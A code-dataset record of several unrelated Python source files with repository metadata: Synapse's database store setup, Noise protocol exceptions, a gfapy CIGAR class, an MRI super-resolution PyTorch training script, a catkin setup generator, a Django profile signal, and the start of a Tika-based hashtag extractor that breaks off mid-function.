fe936b3e6204308d29cdc786cee47c710713c3df
| 10,969
|
py
|
Python
|
synapse/storage/__init__.py
|
xsteadfastx/synapse
|
9a8ae6f1bf833b58416fae1add1972ac3e9d2d59
|
[
"Apache-2.0"
] | 1
|
2017-02-03T18:58:29.000Z
|
2017-02-03T18:58:29.000Z
|
synapse/storage/__init__.py
|
xsteadfastx/synapse
|
9a8ae6f1bf833b58416fae1add1972ac3e9d2d59
|
[
"Apache-2.0"
] | null | null | null |
synapse/storage/__init__.py
|
xsteadfastx/synapse
|
9a8ae6f1bf833b58416fae1add1972ac3e9d2d59
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from synapse.storage.devices import DeviceStore
from .appservice import (
ApplicationServiceStore, ApplicationServiceTransactionStore
)
from ._base import LoggingTransaction
from .directory import DirectoryStore
from .events import EventsStore
from .presence import PresenceStore, UserPresenceState
from .profile import ProfileStore
from .registration import RegistrationStore
from .room import RoomStore
from .roommember import RoomMemberStore
from .stream import StreamStore
from .transactions import TransactionStore
from .keys import KeyStore
from .event_federation import EventFederationStore
from .pusher import PusherStore
from .push_rule import PushRuleStore
from .media_repository import MediaRepositoryStore
from .rejections import RejectionsStore
from .event_push_actions import EventPushActionsStore
from .deviceinbox import DeviceInboxStore
from .state import StateStore
from .signatures import SignatureStore
from .filtering import FilteringStore
from .end_to_end_keys import EndToEndKeyStore
from .receipts import ReceiptsStore
from .search import SearchStore
from .tags import TagsStore
from .account_data import AccountDataStore
from .openid import OpenIdStore
from .client_ips import ClientIpStore
from .util.id_generators import IdGenerator, StreamIdGenerator, ChainedIdGenerator
from .engines import PostgresEngine
from synapse.api.constants import PresenceState
from synapse.util.caches.stream_change_cache import StreamChangeCache
import logging
logger = logging.getLogger(__name__)
class DataStore(RoomMemberStore, RoomStore,
RegistrationStore, StreamStore, ProfileStore,
PresenceStore, TransactionStore,
DirectoryStore, KeyStore, StateStore, SignatureStore,
ApplicationServiceStore,
EventFederationStore,
MediaRepositoryStore,
RejectionsStore,
FilteringStore,
PusherStore,
PushRuleStore,
ApplicationServiceTransactionStore,
EventsStore,
ReceiptsStore,
EndToEndKeyStore,
SearchStore,
TagsStore,
AccountDataStore,
EventPushActionsStore,
OpenIdStore,
ClientIpStore,
DeviceStore,
DeviceInboxStore,
):
def __init__(self, db_conn, hs):
self.hs = hs
self._clock = hs.get_clock()
self.database_engine = hs.database_engine
self._stream_id_gen = StreamIdGenerator(
db_conn, "events", "stream_ordering",
extra_tables=[("local_invites", "stream_id")]
)
self._backfill_id_gen = StreamIdGenerator(
db_conn, "events", "stream_ordering", step=-1,
extra_tables=[("ex_outlier_stream", "event_stream_ordering")]
)
self._receipts_id_gen = StreamIdGenerator(
db_conn, "receipts_linearized", "stream_id"
)
self._account_data_id_gen = StreamIdGenerator(
db_conn, "account_data_max_stream_id", "stream_id"
)
self._presence_id_gen = StreamIdGenerator(
db_conn, "presence_stream", "stream_id"
)
self._device_inbox_id_gen = StreamIdGenerator(
db_conn, "device_max_stream_id", "stream_id"
)
self._public_room_id_gen = StreamIdGenerator(
db_conn, "public_room_list_stream", "stream_id"
)
self._transaction_id_gen = IdGenerator(db_conn, "sent_transactions", "id")
self._state_groups_id_gen = IdGenerator(db_conn, "state_groups", "id")
self._access_tokens_id_gen = IdGenerator(db_conn, "access_tokens", "id")
self._event_reports_id_gen = IdGenerator(db_conn, "event_reports", "id")
self._push_rule_id_gen = IdGenerator(db_conn, "push_rules", "id")
self._push_rules_enable_id_gen = IdGenerator(db_conn, "push_rules_enable", "id")
self._push_rules_stream_id_gen = ChainedIdGenerator(
self._stream_id_gen, db_conn, "push_rules_stream", "stream_id"
)
self._pushers_id_gen = StreamIdGenerator(
db_conn, "pushers", "id",
extra_tables=[("deleted_pushers", "stream_id")],
)
if isinstance(self.database_engine, PostgresEngine):
self._cache_id_gen = StreamIdGenerator(
db_conn, "cache_invalidation_stream", "stream_id",
)
else:
self._cache_id_gen = None
events_max = self._stream_id_gen.get_current_token()
event_cache_prefill, min_event_val = self._get_cache_dict(
db_conn, "events",
entity_column="room_id",
stream_column="stream_ordering",
max_value=events_max,
)
self._events_stream_cache = StreamChangeCache(
"EventsRoomStreamChangeCache", min_event_val,
prefilled_cache=event_cache_prefill,
)
self._membership_stream_cache = StreamChangeCache(
"MembershipStreamChangeCache", events_max,
)
account_max = self._account_data_id_gen.get_current_token()
self._account_data_stream_cache = StreamChangeCache(
"AccountDataAndTagsChangeCache", account_max,
)
self._presence_on_startup = self._get_active_presence(db_conn)
presence_cache_prefill, min_presence_val = self._get_cache_dict(
db_conn, "presence_stream",
entity_column="user_id",
stream_column="stream_id",
max_value=self._presence_id_gen.get_current_token(),
)
self.presence_stream_cache = StreamChangeCache(
"PresenceStreamChangeCache", min_presence_val,
prefilled_cache=presence_cache_prefill
)
push_rules_prefill, push_rules_id = self._get_cache_dict(
db_conn, "push_rules_stream",
entity_column="user_id",
stream_column="stream_id",
max_value=self._push_rules_stream_id_gen.get_current_token()[0],
)
self.push_rules_stream_cache = StreamChangeCache(
"PushRulesStreamChangeCache", push_rules_id,
prefilled_cache=push_rules_prefill,
)
max_device_inbox_id = self._device_inbox_id_gen.get_current_token()
device_inbox_prefill, min_device_inbox_id = self._get_cache_dict(
db_conn, "device_inbox",
entity_column="user_id",
stream_column="stream_id",
max_value=max_device_inbox_id
)
self._device_inbox_stream_cache = StreamChangeCache(
"DeviceInboxStreamChangeCache", min_device_inbox_id,
prefilled_cache=device_inbox_prefill,
)
# The federation outbox and the local device inbox uses the same
# stream_id generator.
device_outbox_prefill, min_device_outbox_id = self._get_cache_dict(
db_conn, "device_federation_outbox",
entity_column="destination",
stream_column="stream_id",
max_value=max_device_inbox_id,
)
self._device_federation_outbox_stream_cache = StreamChangeCache(
"DeviceFederationOutboxStreamChangeCache", min_device_outbox_id,
prefilled_cache=device_outbox_prefill,
)
cur = LoggingTransaction(
db_conn.cursor(),
name="_find_stream_orderings_for_times_txn",
database_engine=self.database_engine,
after_callbacks=[]
)
self._find_stream_orderings_for_times_txn(cur)
cur.close()
self.find_stream_orderings_looping_call = self._clock.looping_call(
self._find_stream_orderings_for_times, 60 * 60 * 1000
)
self._stream_order_on_start = self.get_room_max_stream_ordering()
self._min_stream_order_on_start = self.get_room_min_stream_ordering()
super(DataStore, self).__init__(hs)
def take_presence_startup_info(self):
active_on_startup = self._presence_on_startup
self._presence_on_startup = None
return active_on_startup
def _get_active_presence(self, db_conn):
"""Fetch non-offline presence from the database so that we can register
the appropriate time outs.
"""
sql = (
"SELECT user_id, state, last_active_ts, last_federation_update_ts,"
" last_user_sync_ts, status_msg, currently_active FROM presence_stream"
" WHERE state != ?"
)
sql = self.database_engine.convert_param_style(sql)
txn = db_conn.cursor()
txn.execute(sql, (PresenceState.OFFLINE,))
rows = self.cursor_to_dict(txn)
txn.close()
for row in rows:
row["currently_active"] = bool(row["currently_active"])
return [UserPresenceState(**row) for row in rows]
@defer.inlineCallbacks
def count_daily_users(self):
"""
Counts the number of users who used this homeserver in the last 24 hours.
"""
def _count_users(txn):
txn.execute(
"SELECT COUNT(DISTINCT user_id) AS users"
" FROM user_ips"
" WHERE last_seen > ?",
# This is close enough to a day for our purposes.
(int(self._clock.time_msec()) - (1000 * 60 * 60 * 24),)
)
rows = self.cursor_to_dict(txn)
if rows:
return rows[0]["users"]
return 0
ret = yield self.runInteraction("count_users", _count_users)
defer.returnValue(ret)
def get_user_ip_and_agents(self, user):
return self._simple_select_list(
table="user_ips",
keyvalues={"user_id": user.to_string()},
retcols=[
"access_token", "ip", "user_agent", "last_seen"
],
desc="get_user_ip_and_agents",
)
def are_all_users_on_domain(txn, database_engine, domain):
sql = database_engine.convert_param_style(
"SELECT COUNT(*) FROM users WHERE name NOT LIKE ?"
)
pat = "%:" + domain
txn.execute(sql, (pat,))
num_not_matching = txn.fetchall()[0][0]
if num_not_matching == 0:
return True
return False
| 36.808725
| 88
| 0.661865
|
afb66732b50ea5ef937c0de962a4a54c0989865f
| 334
|
py
|
Python
|
noise/exceptions.py
|
jarret/noiseprotocol
|
e737e159b5c836ff03e4dc93ac386a4e7d610ec8
|
[
"MIT"
] | 169
|
2017-09-12T20:43:39.000Z
|
2022-03-20T15:23:31.000Z
|
noise/exceptions.py
|
jarret/noiseprotocol
|
e737e159b5c836ff03e4dc93ac386a4e7d610ec8
|
[
"MIT"
] | 32
|
2017-09-13T11:03:12.000Z
|
2021-06-23T15:25:40.000Z
|
noise/exceptions.py
|
jarret/noiseprotocol
|
e737e159b5c836ff03e4dc93ac386a4e7d610ec8
|
[
"MIT"
] | 18
|
2018-03-15T19:28:51.000Z
|
2021-11-01T18:59:20.000Z
|
class NoiseProtocolNameError(Exception):
pass
class NoisePSKError(Exception):
pass
class NoiseValueError(Exception):
pass
class NoiseHandshakeError(Exception):
pass
class NoiseInvalidMessage(Exception):
pass
class NoiseMaxNonceError(Exception):
pass
class NoiseValidationError(Exception):
pass
| 12.37037
| 40
| 0.754491
|
5a1e13b6ea2d32000c0a57b166817c1250cc1df3
| 237
|
py
|
Python
|
Advance_Python/Exception_Handling/Catching_Specific_Exception.py
|
siddharth-143/Python
|
293f4643a3a13e3b82d23fd8922db54dbb0f12bc
|
[
"MIT"
] | null | null | null |
Advance_Python/Exception_Handling/Catching_Specific_Exception.py
|
siddharth-143/Python
|
293f4643a3a13e3b82d23fd8922db54dbb0f12bc
|
[
"MIT"
] | null | null | null |
Advance_Python/Exception_Handling/Catching_Specific_Exception.py
|
siddharth-143/Python
|
293f4643a3a13e3b82d23fd8922db54dbb0f12bc
|
[
"MIT"
] | null | null | null |
# Catching Specific Exception
try:
a = int(input("Enter a : "))
b = int(input("Enter b : "))
c = a / b
print(c)
except ZeroDivisionError:
print("division by zero")
except NameError:
print("name is not defined")
| 18.230769
| 32
| 0.611814
|
236f56ebee647da1e638c0c765b9af34368035f1
| 6,025
|
py
|
Python
|
gfapy/alignment/cigar.py
|
ujjwalsh/gfapy
|
891ef3df695f20c67809e5a54549c876d90690b4
|
[
"ISC"
] | 44
|
2017-03-18T08:08:04.000Z
|
2021-11-10T16:11:15.000Z
|
gfapy/alignment/cigar.py
|
ujjwalsh/gfapy
|
891ef3df695f20c67809e5a54549c876d90690b4
|
[
"ISC"
] | 22
|
2017-04-04T21:20:31.000Z
|
2022-03-09T19:05:30.000Z
|
gfapy/alignment/cigar.py
|
ujjwalsh/gfapy
|
891ef3df695f20c67809e5a54549c876d90690b4
|
[
"ISC"
] | 5
|
2017-07-07T02:56:56.000Z
|
2020-09-30T20:10:49.000Z
|
import re
import gfapy
class CIGAR(list):
"""
Representation of the contents of a CIGAR string.
Each operation is represented by a
:class:`CIGAR.Operation <gfapy.alignment.cigar.CIGAR.Operation>`,
which specifies an operation length and operation symbol.
Instances are usually created from their string representations, using the
:class:`~gfapy.alignment.alignment.Alignment` factory class constructor.
Warning:
Although the GFA1 specification does not forbid the
operation symbols NSHX=, these are not allowed in GFA2
and thus their use in GFA1 is discouraged.
"""
def complement(self):
"""The CIGAR when switching the role of the two aligned segments.
Example:
>>> import gfapy
>>> str(gfapy.Alignment("2M1D3M").complement())
'3M1I2M'
Returns:
CIGAR: the complement CIGAR
"""
comp = list(reversed(self))
for op in comp:
if op.code == "I": op.code = "D"
elif op.code == "S": op.code = "D"
elif op.code == "D": op.code = "I"
elif op.code == "N": op.code = "I"
return CIGAR(comp)
def validate(self, version = "gfa1"):
"""Validates the instance.
Parameters:
version (str): 'gfa1' or 'gfa2'
Raises:
~gfapy.error.VersionError: If a wrong **version** is specified.
~gfapy.error.TypeError: If a component of the list is not a
CIGAR Operation; If the CIGAR operation length is not an integer or
a string representing an integer.
~gfapy.error.ValueError: If the length of an operation is < 0; If an
operation code is invalid in general or for the specified GFA version.
"""
if version != "gfa1" and version != "gfa2":
raise gfapy.VersionError(
"Version error: {}".format(repr(version)))
for op in self:
if not isinstance(op, gfapy.CIGAR.Operation):
raise gfapy.TypeError(
"Element is not a CIGAR operation: {}\n".format(op)+
"CIGAR instance is invalid: {}".format(self))
op.validate(version = version)
def length_on_reference(self):
"""Length of the aligned substring on the reference sequence
(**from** sequence for GFA1 links/containments;
**sid1** sequence for GFA2 edges)
Returns:
int
"""
l = 0
for op in self:
if op.code in ["M", "=", "X", "D" , "N"]:
l += op.length
return l
def length_on_query(self):
"""
Lenght of the aligned substring on the query sequence
(**to** sequence for GFA1 links/containments;
**sid2** sequence for GFA2 edges)
Returns:
int
"""
l = 0
for op in self:
if op.code in ["M", "=", "X", "I", "S"]:
l += op.length
return l
@classmethod
def _from_string(cls, string, valid = False, version = "gfa1"):
"""Create a CIGAR instance from its string representation.
Parameters:
string (str)
valid (bool): If **True** the string is guaranteed to be valid.
(Defaults to **False**)
version (str): 'gfa1' or 'gfa2'
Returns:
~gfapy.alignment.cigar.CIGAR or
~gfapy.alignment.placeholder.AlignmentPlaceholder
Raises:
~gfapy.error.FormatError: If the string is not a valid CIGAR string.
"""
if string == "*":
return gfapy.AlignmentPlaceholder()
cigar = CIGAR()
if not valid:
if version == "gfa1":
if not re.match(r"^([0-9]+[MIDNSHPX=])+$", string):
raise gfapy.FormatError()
elif version == "gfa2":
if not re.match(r"^([0-9]+[MIDP])+$", string):
raise gfapy.FormatError()
for m in re.finditer("([0-9]+)([MIDNSHPX=])", string):
cigar.append(CIGAR.Operation(int(m.group(1)), m.group(2)))
return cigar
def __str__(self):
if not self:
return "*"
else:
return "".join([str(op) for op in self])
def __repr__(self):
return "gfapy.CIGAR([{}])".format(", ".join([repr(op) for op in self]))
class Operation:
"""An operation in a CIGAR string.
Attributes:
~Operation.length (int): Operation length.
code (str): Operation code, one of
:attr:`~Operation.CODE`.
"""
CODE_GFA1_ONLY = ["S", "H", "N", "X", "="]
"""Operations only valid in GFA1"""
CODE_GFA1_GFA2 = ["M", "I", "D", "P"]
"""Operations valid in GFA1 and GFA2"""
CODE = CODE_GFA1_ONLY + CODE_GFA1_GFA2
"""CIGAR operation codes"""
def validate(self, version = "gfa1"):
"""Validates the CIGAR operation.
Parameters:
version (str): 'gfa1' or 'gfa2'
Raises:
~gfapy.error.VersionError: If a wrong **version** is specified.
~gfapy.error.TypeError: If the CIGAR operation length is not an integer
or a string representing an integer.
~gfapy.error.ValueError: If the length of an operation is < 0; If an
operation code is invalid in general or for the specified GFA
version.
"""
if version != "gfa1" and version != "gfa2":
raise gfapy.VersionError(
"Version error: {}".format(repr(version)))
if not isinstance(self.length, int) and not isinstance(self.length, str):
raise gfapy.TypeError(
"Type error: length of CIGAR is {}".format(self.length))
if(int(self.length) < 0):
raise gfapy.ValueError("Length of CIGAR is {}".format(self.length))
if version == "gfa2":
if not self.code in Operation.CODE_GFA1_GFA2:
raise gfapy.ValueError()
else:
if not self.code in Operation.CODE:
raise gfapy.ValueError()
def __init__(self, length, code):
self.length = length
self.code = code
def __len__(self):
return self.length
def __str__(self):
return "{}{}".format(self.length, self.code)
def __repr__(self):
return "gfapy.CIGAR.Operation({},{})".format(self.length, repr(self.code))
def __eq__(self, other):
return self.length == other.length and self.code == other.code
Operation = CIGAR.Operation
| 30.583756
| 80
| 0.61195
|
bcdf6c107a02f1ed779b37f4bb97ea803fc3024d
| 14,947
|
py
|
Python
|
train.py
|
bryanlimy/mri-super-resolution
|
9aa846dc3ee817b0188518b1fd0effe1fd33e043
|
[
"MIT"
] | 3
|
2021-04-20T11:22:46.000Z
|
2021-05-15T08:40:45.000Z
|
train.py
|
bryanlimy/mri-super-resolution
|
9aa846dc3ee817b0188518b1fd0effe1fd33e043
|
[
"MIT"
] | 1
|
2021-10-14T09:14:57.000Z
|
2021-10-14T10:40:31.000Z
|
train.py
|
bryanlimy/mri-super-resolution
|
9aa846dc3ee817b0188518b1fd0effe1fd33e043
|
[
"MIT"
] | 1
|
2021-05-15T08:40:55.000Z
|
2021-05-15T08:40:55.000Z
|
import torch
import argparse
import numpy as np
from time import time
from tqdm import tqdm
from pathlib import Path
from shutil import rmtree
import torch.optim as optim
import torch.nn.functional as F
from torch.optim.lr_scheduler import StepLR
from torch.cuda.amp import autocast, GradScaler
from slowMRI.utils import utils
from slowMRI.metrics import metrics
from slowMRI.critic.critic import Critic
from slowMRI.models.registry import get_model
from slowMRI.utils.tensorboard import Summary
from slowMRI.data_loader.data_loader import get_loaders
from slowMRI.data_loader.data_handling import SliceUpsampler
def step(args,
model,
inputs,
targets=None,
optimizer=None,
loss_function=None,
scaler=None,
critic=None,
training: bool = False):
""" batch inputs and targets into args.batch_size """
outputs = torch.zeros_like(targets,
dtype=targets.dtype,
device=targets.device,
requires_grad=False)
if training:
model.train()
else:
model.eval()
results = {}
for i in range(0, inputs.shape[0], args.batch_size):
x = inputs[i:i + args.batch_size]
y = None if targets is None else targets[i:i + args.batch_size]
loss = torch.tensor(0.0, requires_grad=True)
with autocast(enabled=args.mixed_precision):
logits = model(x)
y_pred = F.sigmoid(logits) if args.output_logits else logits
if loss_function is not None:
loss = loss_function(logits, y)
utils.update_dict(results, {'Loss': loss.detach()})
outputs[i:i + args.batch_size] = y_pred.detach()
critic_score = torch.tensor(0.0, requires_grad=True)
if critic is not None:
if y is not None:
if training:
critic_results = critic.train(y.detach(), y_pred.detach())
else:
critic_results = critic.validate(y.detach(), y_pred.detach())
utils.update_dict(results, critic_results)
if args.critic_loss > 0:
critic_score = critic.predict(y_pred)
total_loss = loss + args.critic_loss * (1 - critic_score)
utils.update_dict(results, {'Loss/total_loss': total_loss})
if optimizer is not None:
optimizer.zero_grad()
scaler.scale(total_loss).backward()
scaler.step(optimizer)
scaler.update()
if loss_function is None:
return outputs
else:
results = {k: torch.stack(v).mean() for k, v in results.items()}
return outputs, results
def train(args,
model,
data,
optimizer,
loss_function,
scaler,
summary,
epoch: int = 0,
critic=None) -> dict:
results = {}
for inputs, targets in tqdm(data, desc='Train'):
inputs = torch.flatten(inputs, end_dim=1)
targets = torch.flatten(targets, end_dim=1)
inputs, targets = inputs.to(args.device), targets.to(args.device)
outputs, step_results = step(args,
model,
inputs,
targets=targets,
optimizer=optimizer,
loss_function=loss_function,
scaler=scaler,
critic=critic,
training=True)
utils.update_dict(results, step_results)
utils.update_dict(results, {'NMSE': metrics.nmse(outputs, targets)})
args.global_step += 1
if args.dry_run:
break
for key, value in results.items():
results[key] = torch.stack(value).mean()
summary.scalar(key, results[key], step=epoch, mode=0)
return results
def validate(args,
model,
data,
loss_function,
summary,
epoch: int = 0,
critic=None) -> dict:
samples, results = None, {}
with torch.no_grad():
for inputs, targets in tqdm(data, desc='Validation'):
inputs = torch.flatten(inputs, end_dim=1)
targets = torch.flatten(targets, end_dim=1)
inputs, targets = inputs.to(args.device), targets.to(args.device)
outputs, step_results = step(args,
model,
inputs,
targets=targets,
loss_function=loss_function,
critic=critic,
training=False)
utils.update_dict(results, step_results)
utils.update_dict(
results, {
'MAE': metrics.mae(outputs, targets),
'NMSE': metrics.nmse(outputs, targets),
'PSNR': metrics.psnr(outputs, targets),
'SSIM': metrics.ssim(outputs, targets)
})
# store samples to plot
if samples is None:
samples = {'inputs': inputs, 'targets': targets, 'outputs': outputs}
for key, value in results.items():
results[key] = torch.stack(value).mean()
summary.scalar(key, results[key], step=epoch, mode=1)
if (epoch % 10 == 0) or (epoch + 1 == args.epochs):
summary.plot_side_by_side('side_by_side',
samples,
random_patches=True,
step=epoch,
mode=1)
summary.plot_difference_maps('diff_maps',
samples,
random_patches=True,
step=epoch,
mode=1)
return results
def test(args,
model,
data,
loss_function,
summary,
epoch: int = 0,
critic=None) -> dict:
model.eval()
slice_upsampler = SliceUpsampler(args,
model,
stride=args.upsampler_stride,
loss_function=loss_function,
critic=critic)
results = {}
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(tqdm(data, desc='Test')):
# shape (batch, slices, channels, height, width)
inputs, targets = inputs.to(args.device), targets.to(args.device)
# select middle slice to up-sample
samples, result = slice_upsampler.upsample_batch(
lr_scans=inputs, hr_scans=targets, slice_idx=inputs.shape[1] // 2)
utils.update_dict(results, result)
summary.plot_side_by_side(f'stitched/batch_#{batch_idx+1:02d}',
samples,
random_patches=False,
step=epoch,
mode=2)
for key, value in results.items():
results[key] = torch.stack(value).mean()
summary.scalar(key, results[key], step=epoch, mode=2)
print(f'Test\t\tLoss: {results["Loss"]:.04f}\t'
f'MAE: {results["MAE"]:.4f}\t'
f'PSNR: {results["PSNR"]:.02f}\t'
f'SSIM: {results["SSIM"]:.04f}\n')
utils.save_csv(filename=args.output_dir / 'test_results.csv', data=results)
return results
def main(args):
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# delete args.output_dir if the flag is set and the directory exists
if args.clear_output_dir and args.output_dir.exists():
rmtree(args.output_dir)
args.output_dir.mkdir(parents=True, exist_ok=True)
args.checkpoint_dir = args.output_dir / 'checkpoints'
args.checkpoint_dir.mkdir(parents=True, exist_ok=True)
args.cuda = not args.no_cuda and torch.cuda.is_available()
args.device = torch.device("cuda" if args.cuda else "cpu")
train_loader, val_loader, test_loader = get_loaders(args)
summary = Summary(args)
scaler = GradScaler(enabled=args.mixed_precision)
args.output_logits = (args.loss in ['bce', 'binarycrossentropy'] and
args.model != 'identity')
model = get_model(args, summary)
if args.weights_dir is not None:
model = utils.load_weights(args, model)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
scheduler = StepLR(optimizer,
step_size=5,
gamma=args.gamma,
verbose=args.verbose == 2)
loss_function = utils.get_loss_function(name=args.loss)
critic = None if args.critic is None else Critic(args, summary=summary)
utils.save_args(args)
args.global_step = 0
for epoch in range(args.epochs):
print(f'Epoch {epoch + 1:03d}/{args.epochs:03d}')
start = time()
train_results = train(args,
model=model,
data=train_loader,
optimizer=optimizer,
loss_function=loss_function,
scaler=scaler,
summary=summary,
epoch=epoch,
critic=critic)
val_results = validate(args,
model=model,
data=val_loader,
loss_function=loss_function,
summary=summary,
epoch=epoch,
critic=critic)
end = time()
scheduler.step()
summary.scalar('elapse', end - start, step=epoch, mode=0)
summary.scalar('lr', scheduler.get_last_lr()[0], step=epoch, mode=0)
summary.scalar('gradient_scale', scaler.get_scale(), step=epoch, mode=0)
print(f'Train\t\tLoss: {train_results["Loss"]:.04f}\n'
f'Validation\tLoss: {val_results["Loss"]:.04f}\t'
f'MAE: {val_results["MAE"]:.04f}\t'
f'PSNR: {val_results["PSNR"]:.02f}\t'
f'SSIM: {val_results["SSIM"]:.04f}\n')
utils.save_model(args, model)
test(args,
model=model,
data=test_loader,
loss_function=loss_function,
summary=summary,
epoch=args.epochs,
critic=critic)
summary.close()
if __name__ == '__main__':
# Training settings
parser = argparse.ArgumentParser(description='Bryan GAN')
parser.add_argument('--input_dir', type=str, help='path to dataset')
parser.add_argument('--output_dir',
type=str,
default='runs',
help='directory to write TensorBoard summary.')
parser.add_argument('--model',
type=str,
default='simple_cnn',
help='model to use')
parser.add_argument('--critic',
type=str,
default=None,
help='adversarial loss to use.')
parser.add_argument('--critic_steps',
type=int,
default=1,
help='number of update steps for critic per global step')
parser.add_argument('--critic_loss',
type=float,
default=0.0,
help='critic loss coefficient to the training objective')
parser.add_argument('--weights_dir',
type=str,
default=None,
help='path to directory to load model weights from')
parser.add_argument('--num_filters',
type=int,
default=64,
help='number of filters or hidden units')
parser.add_argument('--normalization', type=str, default='instancenorm')
parser.add_argument('--activation', type=str, default='leakyrelu')
parser.add_argument('--batch_size',
type=int,
default=32,
metavar='N',
help='input batch size for training (default: 4)')
parser.add_argument('--epochs',
type=int,
default=100,
metavar='N',
help='number of epochs to train_epoch (default: 100)')
parser.add_argument('--loss',
type=str,
default='bce',
help='loss function to use')
parser.add_argument('--lr',
type=float,
default=0.001,
metavar='LR',
help='learning rate (default: 0.001)')
parser.add_argument('--gamma',
type=float,
default=0.7,
metavar='M',
help='Learning rate step gamma (default: 0.7)')
parser.add_argument('--no_cuda',
action='store_true',
default=False,
help='disables CUDA training')
parser.add_argument('--dry_run',
action='store_true',
default=False,
help='quickly check a single pass')
parser.add_argument('--seed',
type=int,
default=42,
metavar='S',
help='random seed (default: 42)')
parser.add_argument('--patch_dim',
type=int,
default=64,
help='patch dimension (default: 64)')
parser.add_argument('--upsampler_stride',
type=int,
default=1,
help='Upsampler stride size (default: 1)')
parser.add_argument('--n_patches',
type=int,
default=500,
help='number of patches to generate per sample')
parser.add_argument('--merge_scan_type',
action='store_true',
help='treat FLAIR, T1 and T2 as an image with 3 channels')
parser.add_argument('--scan_input',
action='store_true',
help='feed entire scan to model instead of patches')
parser.add_argument('--save_plots',
action='store_true',
help='save TensorBoard figures and images to disk.')
parser.add_argument('--save_upsampled_image',
action='store_true',
help='saves upsampled images to disk. This is only '
'activated if save_plots is True.')
parser.add_argument('--dpi',
type=int,
default=120,
help='DPI of matplotlib figures')
parser.add_argument('--clear_output_dir',
action='store_true',
help='overwrite existing output directory')
parser.add_argument('--mixed_precision',
action='store_true',
help='use mixed precision compute')
parser.add_argument('--verbose', choices=[0, 1, 2], default=1, type=int)
params = parser.parse_args()
# create output directory
params.output_dir = Path(params.output_dir)
params.output_dir.mkdir(parents=True, exist_ok=True)
main(params)
| 36.456098
| 80
| 0.543855
|
5711d67506695bfaec17428f766dab03b47acf1c
| 1,362
|
py
|
Python
|
build/caster_description/catkin_generated/generate_cached_setup.py
|
FProgrammerLIU/caster_man_ros
|
a75b503fad3a470f985072a2b3953e89074f3223
|
[
"MIT"
] | null | null | null |
build/caster_description/catkin_generated/generate_cached_setup.py
|
FProgrammerLIU/caster_man_ros
|
a75b503fad3a470f985072a2b3953e89074f3223
|
[
"MIT"
] | null | null | null |
build/caster_description/catkin_generated/generate_cached_setup.py
|
FProgrammerLIU/caster_man_ros
|
a75b503fad3a470f985072a2b3953e89074f3223
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/caster/ros_ws/caster/devel;/opt/ros/melodic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/caster/ros_ws/caster/devel/.private/caster_description/env.sh')
output_filename = '/home/caster/ros_ws/caster/build/caster_description/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| 43.935484
| 105
| 0.742291
|
8052b0a3950461145e9592cb2d2f258efacfc17b
| 425
|
py
|
Python
|
authors/apps/authentication/signals.py
|
Kasulejoseph/ah-backend-athena
|
016810d6a2391ae45985b4d43003e51ada1e81be
|
[
"BSD-3-Clause"
] | null | null | null |
authors/apps/authentication/signals.py
|
Kasulejoseph/ah-backend-athena
|
016810d6a2391ae45985b4d43003e51ada1e81be
|
[
"BSD-3-Clause"
] | 31
|
2018-11-26T17:42:35.000Z
|
2022-03-11T23:36:55.000Z
|
authors/apps/authentication/signals.py
|
Kasulejoseph/ah-backend-athena
|
016810d6a2391ae45985b4d43003e51ada1e81be
|
[
"BSD-3-Clause"
] | 6
|
2018-11-23T09:55:02.000Z
|
2021-06-17T15:18:49.000Z
|
from django.db.models.signals import post_save
from django.dispatch import receiver
from authors.apps.profiles.models import Profile
from .models import User
@receiver(post_save, sender=User)
def create_related_profile(sender, instance, created, *args, **kwargs):
"""
Create a user profile when signal is run
"""
if instance and created:
instance.profile = Profile.objects.create(user=instance)
| 25
| 71
| 0.745882
|
0aef38ae5e27af6b02f354d1821a5129492f610a
| 9,305
|
py
|
Python
|
hashtagger/hashtagger.py
|
nichelia/docker-hashtagger
|
43e16144f2939f79b60f1e1d84b58f6be5af067d
|
[
"MIT"
] | 1
|
2018-11-22T11:05:35.000Z
|
2018-11-22T11:05:35.000Z
|
hashtagger/hashtagger.py
|
nichelia/docker-hashtagger
|
43e16144f2939f79b60f1e1d84b58f6be5af067d
|
[
"MIT"
] | null | null | null |
hashtagger/hashtagger.py
|
nichelia/docker-hashtagger
|
43e16144f2939f79b60f1e1d84b58f6be5af067d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import sys, os, urllib, time, logging
import nltk
import tika
tika.initVM()
from texttable import Texttable
from tika import parser
script_name = 'hashtagger.py'
logging.getLogger().setLevel(logging.INFO)
class FileInterpreter:
"""
Responsible for reading a file,
using either python io or
Apache Tika.
Extracts frequent words and
the sentences they are found in.
"""
def __init__(self, filename=''):
self.filename = filename # Hold filename
self.content = None # Hold extracted content of file
self.frequent_words = None # Hold most common occurring words
# Hold sentences of most common occurring words
self.sentences_of_frequent_words = None
if not filename:
logging.warn('%s:FileInterpreter: Failed to create object,'\
' no filename given', script_name)
else:
# Ready to parse file
self.parse()
def parse(self):
"""
File parser.
Using python io if text file (.txt),
Apache Tika otherwise.
Saves contents in variable.
"""
try:
